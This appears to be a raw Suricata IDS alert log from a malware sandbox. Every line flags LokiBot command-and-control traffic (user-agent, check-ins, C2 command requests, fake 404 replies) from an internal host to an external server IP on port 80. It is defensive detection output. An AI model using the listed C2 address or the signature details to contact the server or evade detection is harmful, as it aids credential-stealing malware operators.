                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49806 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50042 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49806 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49806 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49980 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50023 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50044 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49963
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49806 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49820 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49806 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50023 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50044 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50030 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50019 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50044 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50039 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49983 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49925 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50042 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50035 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49925 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49990 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49995 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50048 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49995 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49820 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49990 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50010 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50013 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49990 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50046 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49995
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50027 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50027 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50027 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50024 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50038 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50038 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50042 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50019 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49983 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50027 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49983 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50019 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50010 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50048 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50041 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50013 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49806
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50030 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50013 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50042 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50042 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50030 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50044 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50038 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50035 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50039 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50035 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49881 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50039 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50027 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50038 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49881 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50048 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50010 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50023 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50023 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50024 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50024 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50002 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50048 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50002 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50048 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50019
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50024 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50048
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50036 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50036 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50046
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50036 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49925 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49925 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50044 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50013
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49990 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49990 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50041 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50041 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50038 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50030 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50030 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49745 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50027
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50022 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49745 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50022 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50022 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49976 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49976 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49976 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49866 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49866 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50022 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49866 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50022 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49980 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50031 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50031 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50031 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49866 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50041 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50041 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50031 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49983
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50031 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50024 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50036 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49980 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49980 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50035
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49745 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49832
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50022
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49866 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50043 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50043 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50043 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49976 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50002
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50041
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50039
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50036 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50043 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49881
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50037 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49990
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50010
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49866
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50038
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50031
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50044
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49980
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50036
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50037 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50030
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50037 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49745
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49976 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50042
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50047 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50043 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50047 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50047 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49925
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50024
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50028 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50034 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50037 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50037 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50047 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50028 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50028 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50034 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50025 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50025 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49907 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49976
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50034 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50047 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50028 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50043
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50025 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50028 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50037
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50023
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49820
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49907 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50025 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50025 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49907 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50034 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50028
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50034 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50025
